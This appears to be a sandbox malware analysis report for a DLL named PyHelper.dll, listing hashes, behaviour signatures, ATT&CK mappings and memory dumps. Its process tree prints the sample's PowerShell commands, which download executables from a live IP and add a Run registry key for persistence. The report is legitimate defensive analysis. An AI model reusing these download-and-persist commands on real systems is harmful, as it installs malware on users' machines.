bfeaf1fe93923425053e245e2ccefae72a65f75edad1f1689c55c4f0a1e84455 | Triage

Analysis

max time kernel
1386s
max time network
1174s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
11-05-2024 10:41

Sharing

Report Analysis Logs

General

Target

PyHelper.dll
Size

236KB
MD5

b7bd2243978cfe44cc0d4b28086c4004
SHA1

bbc0f43de71cddc0a1be48fa98b936ebffb817ac
SHA256

bfeaf1fe93923425053e245e2ccefae72a65f75edad1f1689c55c4f0a1e84455
SHA512

e7f924564bcf1a6173cf29bbbcb16994b3e527a93c1059e7be8e86aa5f5887a852a6a9084862caf3e192a5a70336e6ee22bc169c1f1e0300fa72bb9049a0141f
SSDEEP

3072:aSro30CSFTVOo7qzijtY7HBGsBel05YGoAgbceBBCxRXu+E+NO9o6Kgv:akoELH7k8tY7HkLljr1CTbE55

Score

8^/10

execution persistence

Malware Config

Signatures

Blocklisted process makes network request 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

flow pid process

51 396 powershell.exe
52 4012 powershell.exe
53 1380 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Powershell Invoke Web Request.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exe

pid process

396 powershell.exe
1380 powershell.exe
4012 powershell.exe
Downloads MZ/PE file

Adds Run key to start application 2 TTPs 1 IoCs

Registry Run Keys / Startup Folder

Modify Registry

Processes:

powershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\update = "C:\\Users\\Admin\\Documents\\chrome.exe"	powershell.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

pid	process
1380	powershell.exe
396	powershell.exe
4012	powershell.exe
2232	powershell.exe
2232	powershell.exe
396	powershell.exe
4012	powershell.exe
1380	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	396	powershell.exe
Token: SeDebugPrivilege	2232	powershell.exe
Token: SeDebugPrivilege	1380	powershell.exe
Token: SeDebugPrivilege	4012	powershell.exe

Suspicious use of WriteProcessMemory 14 IoCs

Processes:

regsvr32.exeRuntimeBroker.exe

description	pid	process	target process
PID 2348 wrote to memory of 5080	2348	regsvr32.exe	RuntimeBroker.exe
PID 2348 wrote to memory of 5080	2348	regsvr32.exe	RuntimeBroker.exe
PID 2348 wrote to memory of 5080	2348	regsvr32.exe	RuntimeBroker.exe
PID 2348 wrote to memory of 5080	2348	regsvr32.exe	RuntimeBroker.exe
PID 2348 wrote to memory of 5080	2348	regsvr32.exe	RuntimeBroker.exe
PID 2348 wrote to memory of 5080	2348	regsvr32.exe	RuntimeBroker.exe
PID 5080 wrote to memory of 396	5080	RuntimeBroker.exe	powershell.exe
PID 5080 wrote to memory of 396	5080	RuntimeBroker.exe	powershell.exe
PID 5080 wrote to memory of 1380	5080	RuntimeBroker.exe	powershell.exe
PID 5080 wrote to memory of 1380	5080	RuntimeBroker.exe	powershell.exe
PID 5080 wrote to memory of 4012	5080	RuntimeBroker.exe	powershell.exe
PID 5080 wrote to memory of 4012	5080	RuntimeBroker.exe	powershell.exe
PID 5080 wrote to memory of 2232	5080	RuntimeBroker.exe	powershell.exe
PID 5080 wrote to memory of 2232	5080	RuntimeBroker.exe	powershell.exe

C:\Windows\system32\regsvr32.exe
regsvr32 /s C:\Users\Admin\AppData\Local\Temp\PyHelper.dll
1⤵
- Suspicious use of WriteProcessMemory
PID:2348

C:\Windows\system32\RuntimeBroker.exe
RuntimeBroker.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:5080

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
-C "Invoke-WebRequest -Uri "http://62.133.61.130:80/files/addons/chrome_elf.dll" -OutFile "$env:USERPROFILE\Documents\chrome_elf.dll""
3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:396

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
-C "Invoke-WebRequest -Uri "http://62.133.61.130:80/files/addons/chrome.exe" -OutFile "$env:USERPROFILE\Documents\chrome.exe""
3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1380

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
-C "Invoke-WebRequest -Uri "http://62.133.61.130:80/files/addons/105.0.5195.102.manifest" -OutFile "$env:USERPROFILE\Documents\105.0.5195.102.manifest""
3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4012

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
-C "New-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "update" -Value "$env:USERPROFILE\Documents\chrome.exe" -PropertyType "String" -Force"
3⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2232

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

PowerShell

Persistence

Boot or Logon Autostart Execution

Registry Run Keys / Startup Folder

Privilege Escalation

Boot or Logon Autostart Execution

Registry Run Keys / Startup Folder

Defense Evasion

Modify Registry

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
6cf293cb4d80be23433eecf74ddb5503

SHA1
24fe4752df102c2ef492954d6b046cb5512ad408

SHA256
b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

SHA512
0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
160B

MD5
f71defcca185074f67d60f9a0d55c27f

SHA1
f795d99d348e952f00a69e9273f144a05875c170

SHA256
3011b52d8e5080a09f161d009dbed50343f137d78b150b322fa0e506255b6672

SHA512
8c5e378c32294ad191fb70a1118008cd405edd684e3c1c51cdaa2f9e948c443a3078b09d38e3e8611c1bd5e2cd003d2c59f7db6621b0b574bfc209cca55b1f8a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
39f86cb56bdcbab9f5d300114d95bdb4

SHA1
af834cc05a94f9059466ebe84c6ac71719956bea

SHA256
83cdf3eba86fb377b354b132ea1d513112039573bed6da5ee3df333eb3f5f9b8

SHA512
bdb65ead652ac5254f015ff9da860e4a6ca7025ee1682af40faac9e9238f31a7b068518a3439efabefc6994aa29706a5f469159908090739528372aae7e118f6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
c20ac38ae3022e305b8752804aadf486

SHA1
4c144d6cfafb5c37ab4810ff3c1744df81493cdb

SHA256
03cba7e903a418a3966af1dc0debfb5fcfb2ac6d372ec48cb1b93c23e0fd1caf

SHA512
c9def9e5cd09d19b8b47a3f4c61893da715a6ba4b9933c885386d0425ee4ccc30d75eac1097511619d4e6259a46581f803fb38f78a15339391e4e78b0b6153e0

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sxvdhx2q.fxh.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/396-35-0x000002BF0D170000-0x000002BF0D192000-memory.dmp

Filesize
136KB

Download
memory/1380-81-0x00007FFB617D0000-0x00007FFB619C5000-memory.dmp

Filesize
2.0MB

Download
memory/1380-29-0x00007FFB617D0000-0x00007FFB619C5000-memory.dmp

Filesize
2.0MB

Download
memory/2232-69-0x00007FFB617D0000-0x00007FFB619C5000-memory.dmp

Filesize
2.0MB

Download
memory/2232-27-0x00007FFB617D0000-0x00007FFB619C5000-memory.dmp

Filesize
2.0MB

Download
memory/2232-28-0x00007FFB617D0000-0x00007FFB619C5000-memory.dmp

Filesize
2.0MB

Download
memory/2348-0-0x0000000062540000-0x0000000062598000-memory.dmp

Filesize
352KB

Download
memory/2348-8-0x0000000062540000-0x0000000062598000-memory.dmp

Filesize
352KB

Download
memory/2348-2-0x0000000062540000-0x0000000062598000-memory.dmp

Filesize
352KB

Download
memory/2348-16-0x0000000062540000-0x0000000062598000-memory.dmp

Filesize
352KB

Download
memory/2348-1-0x0000000062540000-0x0000000062598000-memory.dmp

Filesize
352KB

Download
memory/5080-4-0x0000025DDAF20000-0x0000025DDAF21000-memory.dmp

Filesize
4KB

Download
memory/5080-18-0x0000025DDAF70000-0x0000025DDAF8D000-memory.dmp

Filesize
116KB

Download
memory/5080-17-0x00007FFB6186D000-0x00007FFB6186E000-memory.dmp

Filesize
4KB

Download
memory/5080-9-0x0000025DDADF0000-0x0000025DDAE0A000-memory.dmp

Filesize
104KB

Download
memory/5080-10-0x0000025DDAF70000-0x0000025DDAF8D000-memory.dmp

Filesize
116KB

Download
memory/5080-5-0x0000025DDAF30000-0x0000025DDAF31000-memory.dmp

Filesize
4KB

Download
memory/5080-6-0x00007FFB6186D000-0x00007FFB6186E000-memory.dmp

Filesize
4KB

Download